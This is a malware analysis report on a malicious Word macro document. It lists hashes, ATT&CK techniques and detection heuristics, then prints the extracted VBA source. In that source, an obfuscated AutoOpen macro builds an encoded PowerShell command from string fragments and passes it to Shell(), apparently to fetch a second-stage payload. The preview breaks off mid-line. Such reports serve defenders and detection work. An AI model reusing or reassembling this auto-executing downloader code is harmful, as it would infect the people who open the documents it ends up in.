Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ddcdbd03ee318a0…

MALICIOUS

Office (OLE)

Size: 112.0 KB
Created: 2018-06-11 15:00:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 47bbde2b0fc0e3048217f920ed606047
SHA-1: 3447fbc7e0536f299c5b17144969f71f91c930dc
SHA-256: 4ddcdbd03ee318a0503bc5c2ef4b0d4ac783f4a1069ac7140471f0c457b703e9
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The critical OLE_VBA_SHELL heuristic fired on this sample, indicating a Shell() call within the VBA macros. The Autoopen subroutine calls the idABiDi function, which passes a command assembled from concatenated string fragments to Shell(). In the extracted source those fragments (Chr(... + vbKeyP + ...) followed by "owers" and "HeLL -e", then a series of Base64 chunks) are consistent with a powershell -e invocation carrying an encoded command. This command likely downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'. The VBA macro is the primary mechanism for this malicious execution.

Heuristics (7)

  • ClamAV: Doc.Downloader.Valyria-6595163-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10701 bytes
SHA-256: 9074a4a4f2dbb426943070cc34c38fbd567bc9c3b9242be8a744b227d9162558

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "djzcjasQD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function idABiDi()
On Error Resume Next
zWJSU = CLng(59606 * CSng(NuQfM + ChrB(JcNawH + CInt(93657))))
ZdDMl = Int(whFMYY)
TstLaj = dKEXfS
iFCHo = GYtGFj
QfpEHn = pjUPV
EbPYfh = jRcDE
ibvzmF = CLng(83390 * CSng(bwUAQr + ChrB(Xuknm + CInt(25305))))
iIVaXQ = Int(wClzX)
dukhJ = jccuYP
FIWrQS = nwmiM
aodwjA = hjdKDd
jNCOw = hLzbK
idABiDi = oFqHAHbXS + Shell(MtniSawpauv + Chr(SLVjIFuf + vbKeyP + FLqEmW) + "owers" + sLMDBWsAt + kNiSTMjU + bPDRPCHCDHE + oSnsHHRV + noXtpi, 83444 - 83444)
hAVjH = CLng(12105 * CSng(bDswj + ChrB(XWJWf + CInt(24175))))
mKqauX = Int(BAPqCm)
TrLCV = iBEoO
CYoYo = OViWK
mjYTbo = wuzEf
UJIFkG = LYVIN
End Function
Sub Autoopen()
On Error Resume Next
aYnQiw = CLng(63703 * CSng(PlfOa + ChrB(mRbEU + CInt(17197))))
UIGQzQ = Int(jOOPG)
NdJiTH = jEYdrK
PtwQoE = GPjzj
YjBWPI = DJIzlM
uQkdY = atpSwb
idABiDi
wGNci = CLng(73219 * CSng(ZADBNi + ChrB(mFlwib + CInt(87278))))
qiDat = Int(iqiYn)
cwwfT = lluNjP
DooDTT = IrQiZ
sWvJU = acHpJG
iqIMdv = kqQqnO
End Sub


Attribute VB_Name = "nzkjNGQ"
Function sLMDBWsAt()
On Error Resume Next
khvfj = CLng(113 * CSng(jjHGFc + ChrB(OfOPE + CInt(88014))))
kqhUO = Int(zWBoML)
TwjuW = zZKvZQ
CoaIVt = MzrOK
BkKfT = uXkQvU
WujauH = mvJvt
wjJjiv = "HeLL -e" + " IAAuACAAK" + "AAgACQAZQBu" + "AF" + "YAOgBDAE8ATQBz"
SzsUG = CLng(39453 * CSng(EjPPfb + ChrB(WESXio + CInt(54757))))
SjYwG = Int(fFaOl)
auiQK = kopiRv
ciidm = EqvjM
JNiYap = taEbZ
NDDni = OddiXz
rHsJO = "AHAARQBjAF" + "sANAA" + "sADEANQAsADIA" + "NQBdAC0A" + "agBvAGkAbgAnA" + "CcAKQAgACgAbgBF" + "AH" + "cALQBvAEIASgBFA" + "EMAdAAgACA" + "AaQBPAC4AYw"
owhLfO = CLng(33930 * CSng(ANGQO + ChrB(PCtXHI + CInt(51599))))
NACNt = Int(SjiHbw)
ELPZN = hMpzX
wzajH = oBPjj
SUTCT = zoQoLq
wuAtLY = itvwr
wLDAWhndL = "BPAG0" + "AcAByAGUAcwBzA" + "EkAbw" + "Bu"
brnwlV = CLng(59611 * CSng(Hsoft + ChrB(wjDJn + CInt(69429))))
IVnID = Int(diYZU)
WDHBU = qLXrC
NSNEv = mLHqSW
nhKBcj = TVWHr
iFzYiR = bvlwZ
zFzPRwAtpsm = "AC4AZAB" + "lAEYATABhA" + "FQARQBzAFQAc" + "gBFAG" + "EAbQAoACA" + "AWwBzAHkAcwB"
hnJCfk = CLng(70848 * CSng(hWfKu + ChrB(itrvG + CInt(24919))))
IhNjI = Int(DYrvN)
uBjJSq = GfBiR
nJjiD = qMUZGv
Xjhip = RjAGCj
FjGiG = wVUqTp
UFLrHpZMaA = "0AE" + "UA" + "TQAuAE" + "kATwAu" + "AG0ARQBNAG8AU" + "gBZAHMAdABS" + "AGUAYQBN"
GXOacZ = CLng(26473 * CSng(TnZBMH + ChrB(imDjwf + CInt(69342))))
GlSHz = Int(CsNoCU)
UaddVZ = whhuqw
inmrIW = IoJSN
QuLNK = FKMZDd
zKYDY = DHUFa
CWGTbYPJ = "AF0AWwBjAE8" + "AbgB2AGUA" + "cgB0AF0" + "AOg" + "A6AGYAUgB" + "vAE0AYgBBAFMA" + "RQA2AD" + "QAUwBUAFIAa" + "QBuAEcAKAAgA"
tziMlT = CLng(20221 * CSng(XVCVU + ChrB(DqjWNi + CInt(26376))))
YEjll = Int(Ktwok)
Qpawa = tVicI
inNMb = ssjrZa
AiIzdY = kEUNQ
vHpsTv = jCzozR
sPChrDYd = "CcAV" + "gBWAEIAaAB" + "TADgATQ" + "B3AEYA" + "UAB" + "3A" + "HI" + "AKwBWAEQAbw" + "BoAGkAN"
sLMDBWsAt = wjJjiv + rHsJO + wLDAWhndL + zFzPRwAtpsm + UFLrHpZMaA + CWGTbYPJ + sPChrDYd
End Function
Function kNiSTMjU()
On Error Resume Next
wsjYQA = CLng(42106 * CSng(XkYED + ChrB(SiTzwu + CInt(3884))))
CrXddv = Int(kUzMaR)
YvzQLW = ETPsBO
doBXw = ppBnW
cmQYs = daGYCf
fAwXIl = hZHfwo
JWwWiZLB = "QB4AE8AawBWA" + "FgAQgBKADEAT" + "wB" + "jAEc" + "Aeg" + "BWAFcAVgBFA" + "FUAbwBh" + "AFQ"
FCiuKu = CLng(72790 * CSng(znvXOY + ChrB(SEmVpQ + CInt(23251))))
RtBtsD = Int(lZEzXX)
irlwm = KckWE
GCscwN = KRAIAt
SCVTOA = uaukt
JhpIfp = wctwFm
vizsmsUXb = "AeABiA" + "GMAMgBXAEoAaQ" + "BWADUAMgB" + "zADIAeAAvADIAN" + "ABzADMAYw"
NGdjkC = CLng(91784 * CSng(IGRHDd + ChrB(czsFi + CInt(68463))))
bsdLvu = Int(JYNcVC)
wLAqiZ = jqXlV
AvEzDv = ilFZHB
whEfha = jmrPA
EsCGZ = JoOTNY
poozOpvZGM = "BBAHYARAA5" + "ADYA" + "NwB1ADMA" + "ZgBIAEI" + "AWgBQAFI"
TJLFbi = CLng(63501 * CSng(aBmrDu + ChrB(UINkD + CInt(70937))))
mizzhr = Int(kOqGH
... (truncated)